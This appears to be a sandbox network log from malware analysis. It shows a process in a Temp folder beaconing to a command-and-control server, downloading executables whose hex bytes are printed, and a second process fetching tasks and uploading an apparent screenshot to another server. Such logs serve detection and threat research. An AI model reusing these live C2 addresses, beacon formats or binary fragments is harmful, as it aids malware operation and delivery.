Aug 31, 2024 15:44:40.185096979 CEST	1236	IN	Data Raw: 00 89 44 24 08 c3 e8 89 12 07 00 eb d7 8d 7c 24 04 39 3b 75 e6 89 23 eb e2 cc cc cc cc cc cc cc cc cc cc cc 8b 0d 94 dd d1 00 64 8b 09 8b 09 3b 61 08 76 36 8b 44 24 04 8b 08 8b 54 24 08 39 0a 75 22 0f b7 48 04 66 39 4a 04 75 18 0f b7 48 06 66 39 Data Ascii: D$\|$9;u#d;av6D$T$9u"Hf9JuHf9Ju@9BD$D$%d;avD$d;a<D$DL$EL$FL$GL$HT$I
Aug 31, 2024 15:44:40.185110092 CEST	1236	IN	Data Raw: 04 65 78 70 61 c7 40 08 65 78 70 61 c7 40 0c 65 78 70 61 c7 40 10 6e 64 20 33 c7 40 14 6e 64 20 33 c7 40 18 6e 64 20 33 c7 40 1c 6e 64 20 33 c7 40 20 32 2d 62 79 c7 40 24 32 2d 62 79 c7 40 28 32 2d 62 79 c7 40 2c 32 2d 62 79 c7 40 30 74 65 20 6b Data Ascii: expa@expa@expa@nd 3@nd 3@nd 3@nd 3@ 2-by@$2-by@(2-by@,2-by@0te k@4te k@8te k@<te kL$P@PDPHPLQPPPTPXP\QP`PdPhPlQPpPtPxP\|QQQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49740	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:47.928752899 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000228001&unit=246122658369
Aug 31, 2024 15:44:48.671751976 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Aug 31, 2024 15:44:48.674209118 CEST	55	OUT	GET /inc/runtime.exe HTTP/1.1 Host: 185.215.113.16
Aug 31, 2024 15:44:48.916646004 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:48 GMT Content-Type: application/octet-stream Content-Length: 1411961 Last-Modified: Fri, 30 Aug 2024 22:54:50 GMT Connection: keep-alive ETag: "66d24dba-158b79" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 4b 5a 65 25 2a 34 36 25 2a 34 36 25 2a 34 36 2c 52 b7 36 26 2a 34 36 2c 52 a7 36 34 2a 34 36 25 2a 35 36 89 2a 34 36 3e b7 9e 36 2b 2a 34 36 3e b7 ae 36 24 2a 34 36 3e b7 a9 36 24 2a 34 36 52 69 63 68 25 2a 34 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cf e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 70 00 00 00 da 3e 00 00 42 00 00 99 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 c0 48 00 00 04 00 00 cb 29 16 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$aKZe%46%46%46,R6&46,R6446%5646>6+46>6$46>6$46Rich%46PELGOp>B8@H)@40GO?H.textop `.rdatab,t@@.dataf>@.ndata ?.rsrcO0GP@@.reloc2H4@B
Aug 31, 2024 15:44:48.916670084 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 Data Ascii: U\}t+}FEuHHPuuu@KSV5WEPu@eEEPu@}eD@FRVVU+MMEFQNUMMVTU
Aug 31, 2024 15:44:48.916681051 CEST	448	IN	Data Raw: 04 00 55 8b ec 81 ec 10 02 00 00 53 56 57 8d 45 fc 50 a1 d0 16 7f 00 83 c8 08 50 33 db 53 ff 75 0c ff 75 08 ff 15 04 80 40 00 3b c3 75 69 8b 35 00 80 40 00 bf 05 01 00 00 eb 19 39 5d 10 75 4b 53 8d 85 f0 fd ff ff 50 ff 75 fc e8 b2 ff ff ff 85 c0 Data Ascii: USVWEPP3Suu@;ui5@9]uKSPuuWPSutu@jN;t$S5uuu@3@_^[9uuu@uU@@Vt5EPEPjj"PV
Aug 31, 2024 15:44:48.916692972 CEST	1236	IN	Data Raw: 80 8f 40 00 e8 55 4c 00 00 59 59 53 56 e8 30 fd ff ff e9 7c 1a 00 00 53 e8 e4 fd ff ff 50 68 60 8f 40 00 e8 36 4c 00 00 59 59 53 ff 75 d4 e8 fa 38 00 00 e9 50 1a 00 00 33 c9 e8 ac fd ff ff 8b f0 56 68 4c 8f 40 00 e8 12 4c 00 00 59 59 83 fe 01 7f Data Ascii: @ULYYSV0\|SPh`@6LYYSu8P3VhL@LYY3FV@&h0@KYu@@9]u%`3ASM`u43;#MD4~5D@;
Aug 31, 2024 15:44:48.916703939 CEST	1236	IN	Data Raw: 03 50 68 d0 f0 40 00 e8 7b 41 00 00 83 e8 04 75 10 68 70 8b 40 00 e8 6f 47 00 00 59 e9 36 ff ff ff 48 74 40 68 40 8b 40 00 e8 5c 47 00 00 59 56 6a fa e9 c7 fa ff ff ff 75 cc 6a e2 e8 18 34 00 00 83 7d 08 02 75 07 c7 45 fc 01 00 00 00 ff 75 08 56 Data Ascii: Ph@{Auhp@oGY6Ht@h@@\GYVjuj4}uEuVh@.GPh@GYCuj3SSuuVWh@F}u}tEPSPu`@u@;ujVLuVDj
Aug 31, 2024 15:44:48.916713953 CEST	208	IN	Data Raw: 00 eb 30 6a 01 e8 4f f4 ff ff 6a 12 8b f8 e8 46 f4 ff ff 0f b7 08 f7 d9 1b c9 23 c8 0f b7 07 f7 d8 51 1b c0 23 c7 50 ff 75 08 ff 75 cc ff 15 a4 82 40 00 89 45 f8 39 5d d4 0f 8c a1 10 00 00 ff 75 f8 e9 93 10 00 00 33 c9 e8 f5 f3 ff ff 50 ff 15 6c Data Ascii: 0jOjF#Q#Puu@E9]u3Pl@sUjY3PAPp@Z(Pj3Pt@DQup@EPV@EEjPEEPSSPS
Aug 31, 2024 15:44:48.917151928 CEST	1236	IN	Data Raw: 78 82 40 00 50 53 68 72 01 00 00 56 ff 15 88 82 40 00 3b c3 0f 84 f6 0f 00 00 50 ff 15 44 80 40 00 e9 ea 0f 00 00 6a 48 6a 5a ff 75 f4 ff 15 7c 82 40 00 50 ff 15 40 80 40 00 50 6a 02 59 e8 30 f3 ff ff 50 ff 15 50 81 40 00 6a 03 f7 d8 59 a3 f0 f0 Data Ascii: x@PShrV@;PD@jHjZu\|@P@@PjY0PP@jYAuAEA$hAAAAFhAL@g33A9]th@"AYWV9]uD@9@.Sj1j"
Aug 31, 2024 15:44:48.917162895 CEST	224	IN	Data Raw: 00 8b 45 08 8b 08 57 50 ff 51 50 89 45 cc 8b 45 08 8b 08 68 b0 a0 84 00 50 ff 51 24 8b 4d e4 8b c1 c1 f8 08 23 c6 74 0d 8b 4d 08 8b 11 50 51 ff 52 3c 8b 4d e4 8b 45 08 8b 10 c1 f9 10 51 50 ff 52 34 8b 45 f0 66 39 18 74 10 8b 7d e4 8b 4d 08 8b 11 Data Ascii: EWPQPEEhPQ$M#tMPQR<MEQPR4Ef9t}M#WPQRDEuPQ,EuPQ9]\|EjuPQEEPQEPQ9]}h@Ej0h@j$Sjj#WVh@E
Aug 31, 2024 15:44:48.917200089 CEST	1236	IN	Data Raw: e8 2d 3c 00 00 83 c4 0c 56 e8 56 3c 00 00 85 c0 75 0d 53 6a f9 e8 e7 28 00 00 e9 6d f3 ff ff 8b 45 f4 56 89 45 a4 c7 45 a8 02 00 00 00 e8 7c 39 00 00 33 c9 57 66 89 4c 46 02 e8 6f 39 00 00 33 c9 66 89 4c 47 02 8b 45 08 66 8b 4d dc 50 53 89 75 ac Data Ascii: -<VV<uSj(mEVEE\|93WfLFo93fLGEfMPSu}EfM(EP@h@@V]]]8V0AW89]tSE9]tjE9]tj"EjSWVh@h@
Aug 31, 2024 15:44:48.917216063 CEST	104	IN	Data Raw: d0 f0 40 00 53 53 ff 15 48 81 40 00 ff 75 08 ff 15 4c 81 40 00 66 39 1e 74 1e 53 8d 4d bc 51 50 ff 75 08 56 e8 fc 33 00 00 50 ff 15 54 81 40 00 85 c0 0f 85 f1 f7 ff ff c7 45 fc 01 00 00 00 e9 e5 f7 ff ff 6a 02 59 e8 9f e8 ff ff 89 45 f8 83 f8 01 Data Ascii: @SSH@uL@f9tSMQPuV3PT@EjYE0 ;~Mf9
Aug 31, 2024 15:44:48.918015003 CEST	1236	IN	Data Raw: 84 b3 00 00 00 56 88 5d c7 e8 af 33 00 00 89 45 bc 39 5d f8 0f 8e 9e 00 00 00 8b f3 53 8d 45 ec 50 6a 01 8d 45 0b 50 ff 75 bc ff 15 58 81 40 00 85 c0 0f 84 82 00 00 00 83 7d ec 01 75 7c 39 5d e0 75 39 6a 02 8d 45 f4 50 6a 01 8d 45 0b 50 53 53 ff Data Ascii: V]3E9]SEPjEPuX@}u\|9]u9jEPjEPSS\@E<t.<t*fEfwEFE:tE;u\|>EPW3:Et}t}ufEfwFjSju`@3fw;9]t3Af@3@jP3f9[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49741	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:51.358160019 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 33 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000234001&unit=246122658369
Aug 31, 2024 15:44:52.097876072 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Aug 31, 2024 15:44:52.108485937 CEST	55	OUT	GET /inc/Amadeus.exe HTTP/1.1 Host: 185.215.113.16
Aug 31, 2024 15:44:53.239871979 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:52 GMT Content-Type: application/octet-stream Content-Length: 435200 Last-Modified: Fri, 30 Aug 2024 22:07:37 GMT Connection: keep-alive ETag: "66d242a9-6a400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ef 1e d2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 06 05 00 00 ce 01 00 00 00 00 00 94 f4 01 00 00 10 00 00 00 20 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELf @@\|#M8\|@ $.text `.rdata @@.data\|f@4 @.rsrcT@@.relocMNV@B
Aug 31, 2024 15:44:53.239886045 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 20 e0 44 00 e8 f4 e1 01 00 59 c3 cc cc cc cc 68 c0 df 44 00 e8 e4 e1 01 00 59 Data Ascii: h DYhDYj hE<LF?hDYj hE$RFhDYjhERFh@DYj hE\MFhDcYjh4E
Aug 31, 2024 15:44:53.239897966 CEST	1236	IN	Data Raw: 51 46 00 e8 bf 8b 01 00 68 00 e2 44 00 e8 43 e1 01 00 59 c3 cc cc cc 6a 18 68 4c a3 45 00 b9 64 4b 46 00 e8 9f 8b 01 00 68 60 e2 44 00 e8 23 e1 01 00 59 c3 cc cc cc 6a 00 68 cb a1 45 00 b9 9c 52 46 00 e8 7f 8b 01 00 68 c0 e2 44 00 e8 03 e1 01 00 Data Ascii: QFhDCYjhLEdKFh`D#YjhERFhDYjhERF_h DYjhEtMF?hDYjhEJFhDYjhhEKFh@DYjhtEUFhDcY
Aug 31, 2024 15:44:53.239967108 CEST	104	IN	Data Raw: cc cc cc 6a 0c 68 18 a6 45 00 b9 04 4b 46 00 e8 df 86 01 00 68 a0 f0 44 00 e8 63 dc 01 00 59 c3 cc cc cc 6a 0c 68 28 a6 45 00 b9 9c 4c 46 00 e8 bf 86 01 00 68 00 f1 44 00 e8 43 dc 01 00 59 c3 cc cc cc 6a 04 68 38 a6 45 00 b9 64 4e 46 00 e8 9f 86 Data Ascii: jhEKFhDcYjh(ELFhDCYjh8EdNFh`D#Yjh@
Aug 31, 2024 15:44:53.239983082 CEST	1236	IN	Data Raw: 45 00 b9 44 53 46 00 e8 7f 86 01 00 68 c0 f1 44 00 e8 03 dc 01 00 59 c3 cc cc cc 6a 04 68 48 a6 45 00 b9 28 56 46 00 e8 5f 86 01 00 68 20 f2 44 00 e8 e3 db 01 00 59 c3 cc cc cc 6a 04 68 50 a6 45 00 b9 34 54 46 00 e8 3f 86 01 00 68 80 f2 44 00 e8 Data Ascii: EDSFhDYjhHE(VF_h DYjhPE4TF?hDYjhXEKFhDYjhdEXVFh@DYjhtE4KFhDcYjhENFhDCYjhEKFh`D#
Aug 31, 2024 15:44:53.239995003 CEST	1236	IN	Data Raw: 01 00 59 c3 cc cc cc 6a 04 68 60 a8 45 00 b9 40 56 46 00 e8 9f 81 01 00 68 60 00 45 00 e8 23 d7 01 00 59 c3 cc cc cc 6a 04 68 68 a8 45 00 b9 e4 52 46 00 e8 7f 81 01 00 68 c0 00 45 00 e8 03 d7 01 00 59 c3 cc cc cc 6a 40 68 70 a8 45 00 b9 a4 4d 46 Data Ascii: Yjh`E@VFh`E#YjhhERFhEYj@hpEMF_h EYjhEPF?hEYjLhElOFhEYj<hE\|KFh@EYjhPE\|QFhEcYjh`EOF
Aug 31, 2024 15:44:53.240005016 CEST	448	IN	Data Raw: df 7c 01 00 68 a0 0e 45 00 e8 63 d2 01 00 59 c3 cc cc cc 6a 18 68 04 ad 45 00 b9 bc 53 46 00 e8 bf 7c 01 00 68 00 0f 45 00 e8 43 d2 01 00 59 c3 cc cc cc 6a 08 68 20 ad 45 00 b9 2c 4d 46 00 e8 9f 7c 01 00 68 60 0f 45 00 e8 23 d2 01 00 59 c3 cc cc Data Ascii: \|hEcYjhESF\|hECYjh E,MF\|h`E#Yjh,E\PF\|hEYh EYhEYhEYj?hEPF/\|h@EYhEYjhFh E
Aug 31, 2024 15:44:53.240015030 CEST	1236	IN	Data Raw: d0 01 00 59 c3 6a 02 e8 ed 86 03 00 59 a3 c8 7a 46 00 c3 e8 d7 fa 01 00 a3 2c 7b 46 00 c3 68 38 7b 46 00 ff 15 e4 21 45 00 c3 cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b 75 0c 85 f6 75 05 33 c0 5e 5d c3 85 c9 75 18 e8 2a 6f 03 00 c7 00 16 00 00 00 Data Ascii: YjYzF,{Fh8{F!EUVuu3^]u*off^]W}twVWQ\53_^]hjQ:unf_^]vn"e_"^]UE]F
Aug 31, 2024 15:44:53.240029097 CEST	1236	IN	Data Raw: 04 75 0f 8b 00 3b 06 75 09 b0 01 5e 8b e5 5d c2 08 00 32 c0 5e 8b e5 5d c2 08 00 cc cc cc cc 55 8b ec 8b 41 04 56 8b 75 08 8b 56 04 3b 42 04 75 0e 8b 06 3b 45 0c 75 07 b0 01 5e 5d c2 08 00 32 c0 5e 5d c2 08 00 cc cc cc cc cc cc cc cc cc 53 8b dc Data Ascii: u;u^]2^]UAVuV;Bu;Eu^]2^]SUkl$jhDdPSX@F3EVWPEd}CMP}mCsEEMtDU+r AE: ECEfDjhEEM
Aug 31, 2024 15:44:53.240040064 CEST	1236	IN	Data Raw: 0c a1 14 40 46 00 33 c5 89 45 fc 56 8b f1 c7 45 f4 f0 a1 45 00 8d 4e 04 c6 45 f8 01 51 8d 45 f4 0f 57 c0 c7 06 f4 25 45 00 50 66 0f d6 01 e8 34 29 03 00 8b 4d fc 83 c4 08 c7 06 50 38 45 00 8b c6 33 cd 5e e8 63 c0 01 00 8b e5 5d c2 04 00 cc cc cc Data Ascii: @F3EVEENEQEW%EPf4)MP8E3^c]UjhDdP@F3EVPEduuEvFVEjVpMdY^M3]UVjMEWVuF
Aug 31, 2024 15:44:53.240051985 CEST	672	IN	Data Raw: 04 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 04 00 50 e8 36 ae 01 00 50 e8 30 ae 01 00 50 e8 2a ae 01 00 50 e8 24 ae 01 00 50 e8 1e ae 01 00 cc cc cc cc 55 8b ec 6a ff 68 b0 a5 44 00 64 a1 00 00 00 00 50 83 ec 14 a1 14 40 46 00 33 c5 Data Ascii: MdY_^[]P6P0P*P$PUjhDdP@F3ESVWPEd}sVEu:EC<tQ3H98tu uK<JxuS@jP_GHuPE_VE
Aug 31, 2024 15:44:53.240345001 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:52 GMT Content-Type: application/octet-stream Content-Length: 435200 Last-Modified: Fri, 30 Aug 2024 22:07:37 GMT Connection: keep-alive ETag: "66d242a9-6a400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ef 1e d2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 06 05 00 00 ce 01 00 00 00 00 00 94 f4 01 00 00 10 00 00 00 20 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELf @@\|#M8\|@ $.text `.rdata @@.data\|f@4 @.rsrcT@@.relocMNV@B
Aug 31, 2024 15:44:53.240715981 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:52 GMT Content-Type: application/octet-stream Content-Length: 435200 Last-Modified: Fri, 30 Aug 2024 22:07:37 GMT Connection: keep-alive ETag: "66d242a9-6a400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ef 1e d2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 06 05 00 00 ce 01 00 00 00 00 00 94 f4 01 00 00 10 00 00 00 20 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELf @@\|#M8\|@ $.text `.rdata @@.data\|f@4 @.rsrcT@@.relocMNV@B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49743	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:54.094786882 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 33 38 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000238002&unit=246122658369
Aug 31, 2024 15:44:54.794990063 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49744	185.215.113.19	80	1652	C:\Users\user\1000238002\Amadeus.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:54.228502989 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:44:55.084063053 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:44:55.138489008 CEST	309	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 35 35 41 33 34 46 33 45 37 34 34 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 43 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA613555A34F3E7442A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AC
Aug 31, 2024 15:44:55.541290045 CEST	369	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 62 33 0d 0a 20 3c 63 3e 31 30 30 30 32 36 32 30 30 31 2b 2b 2b 39 37 32 38 39 64 30 33 35 31 36 65 39 34 31 64 33 61 66 64 64 61 66 39 62 34 38 39 33 61 66 63 64 39 37 36 35 32 66 65 61 66 37 61 36 63 31 62 64 65 39 33 66 63 34 31 35 65 65 65 23 31 30 30 30 32 36 34 30 32 31 2b 2b 2b 39 37 32 38 39 64 30 33 31 38 37 62 39 34 30 33 37 37 61 34 38 34 61 61 65 35 63 62 36 65 62 65 63 33 33 37 31 32 61 62 62 33 33 31 36 34 31 62 64 63 39 39 66 39 34 34 35 66 65 30 32 61 65 35 34 65 32 35 30 39 63 37 35 38 62 35 62 63 36 35 38 39 31 63 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: b3 <c>1000262001+++97289d03516e941d3afddaf9b4893afcd97652feaf7a6c1bde93fc415eee#1000264021+++97289d03187b940377a484aae5cb6ebec33712abb331641bdc99f9445fe02ae54e2509c758b5bc65891c#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49745	185.215.113.19	80	1652	C:\Users\user\1000238002\Amadeus.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:54.292285919 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYwMTk= Host: 185.215.113.19 Content-Length: 86171 Cache-Control: no-cache
Aug 31, 2024 15:44:54.292325020 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 77 4d 54 6b 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYwMTk=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 15:44:54.292368889 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 15:44:54.292402029 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 15:44:54.292449951 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 15:44:54.292449951 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
